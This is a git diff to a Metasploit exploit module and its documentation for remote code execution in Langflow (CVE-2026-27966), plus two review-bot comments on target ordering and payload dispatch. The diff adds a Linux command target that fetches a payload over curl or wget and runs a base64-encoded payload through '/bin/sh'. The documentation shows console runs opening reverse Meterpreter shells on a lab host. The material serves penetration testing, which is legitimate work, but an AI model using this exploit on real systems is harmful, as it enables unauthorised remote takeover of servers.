diff --git a/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md b/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md index 4d97aa50e4..ea0555e0db 100644 --- a/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md +++ b/documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md @@ -78,9 +78,11 @@ Valid ollama model name. ## Scenarios + +### cmd/linux/http/x64/meterpreter_reverse_tcp ``` msf > use exploit/multi/http/langflow_rce_cve_2026_27966 -[*] Using configured payload python/meterpreter/reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp msf exploit(multi/http/langflow_rce_cve_2026_27966) > options Module options (exploit/multi/http/langflow_rce_cve_2026_27966): 
@@ -97,39 +99,85 @@ Module options (exploit/multi/http/langflow_rce_cve_2026_27966): VHOST no HTTP server virtual host -Payload options (python/meterpreter/reverse_tcp): +Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): - Name Current Setting Required Description - ---- --------------- -------- ----------- - LHOST yes The listen address (an interface may be specified) - LPORT 4444 yes The listen port + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE true yes Attempt to delete the binary after execution + FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac + cepted: none, python3.8+, shell-search, shell) + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8080 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + + When FETCH_COMMAND is one of CURL,GET,WGET: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + + When FETCH_FILELESS is none: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_FILENAME yVhDYYwMmZm no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces Exploit target: Id Name -- ---- - 0 Python payload + 0 Linux Command View the full module info with the info, or info -d command. 
-msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest +msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest payl +oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable. -[*] Project: b7717dc4-4cd2-4292-8c26-6ffe8b875aad -[*] Flow: d712a8b3-8a15-416b-8887-b8792242dc99 -[*] Job: c432a0d8-3667-4f94-b3a2-42cc9e000e15 +[*] Project: 367f399f-6f17-43a2-bea0-33183baae731 +[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087 +[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9 [*] Waiting... -[*] Sending stage (23404 bytes) to 192.168.56.16 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:33598) at 2026-04-08 21:48:58 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900 meterpreter > getuid Server username: user meterpreter > sysinfo -Computer : ce88a7f7aecb +Computer : d513d5e46402 +OS : Debian 13.3 (Linux 6.8.0-56-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` + +### python/meterpreter/reverse_tcp +``` +msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey= model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable. 
+[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401 +[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b +[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8 +[*] Waiting... +[*] Sending stage (23404 bytes) to 192.168.56.16 +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900 + +meterpreter > getuid +Server username: user +meterpreter > sysinfo +Computer : d513d5e46402 OS : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025 Architecture : x64 System Language : C diff --git a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb index d598c97b4d..6bd9bfb99c 100644 --- a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb +++ b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb @@ -29,6 +29,14 @@ class MetasploitModule < Msf::Exploit::Remote ['GHSA', '3645-fxcv-hqr4'], ], 'Targets' => [ + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + } + } + ], [ 'Python payload', { @@ -133,7 +141,13 @@ class MetasploitModule < Msf::Exploit::Remote exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL']) exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI']) exploit_data = exploit_data.gsub('__FILEPATH__', path) - exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode) + case target['Arch'] + when ARCH_PYTHON + payload_data = payload.encode + else + payload_data = "__import__('os').system('echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|/bin/sh')" + end + exploit_data = exploit_data.gsub('__PAYLOAD__', payload_data) exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8)) # construct POST data data = Rex::MIME::Message.new
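Review bot: Inserting the new 'Linux Command' entry at the head of the 'Targets' array renumbers the existing 'Python payload' target and makes the fetch payload the module default, which is visible in the updated doc output (`0 Linux Command`, and the Python scenario now has to pass `target=Python\ payload` explicitly). Anyone who pinned `TARGET 0` or relied on the previous python default will now get a target that needs a reachable FETCH_SRVHOST/FETCH_SRVPORT listener. If keeping the old default matters, append the new target after 'Python payload' instead; if the change is intended, a one-line note in the doc's Scenarios section saying the default target moved would save users a surprise. The 'Targets' array continues past the end of the hunk, so the Python target's own options are not visible here.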
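Review bot: The dispatch `case target['Arch']` / `when ARCH_PYTHON` compares the raw metadata value with `===`, and the new target declares its arch as an array (`'Arch' => [ ARCH_CMD ]`), so the branch only works because the Python target (outside the hunk) presumably declares a bare `ARCH_PYTHON`; normalising either target to the other form would silently route the Python payload through the `echo …|base64 -d|/bin/sh` wrapper. Keying on the attribute this change actually sets is sturdier: `case target['Type']` / `when :nix_cmd` with the shell wrapper in that branch and `payload.encode` in the `else`, or `if target.arch.include?(ARCH_CMD)`, which goes through the normalised arch list. The two branches also reach the payload bytes through different calls (`payload.encode` vs `payload.encoded`); if both yield the same string, using one of them keeps the case readable. The enclosing method starts and ends outside the hunk.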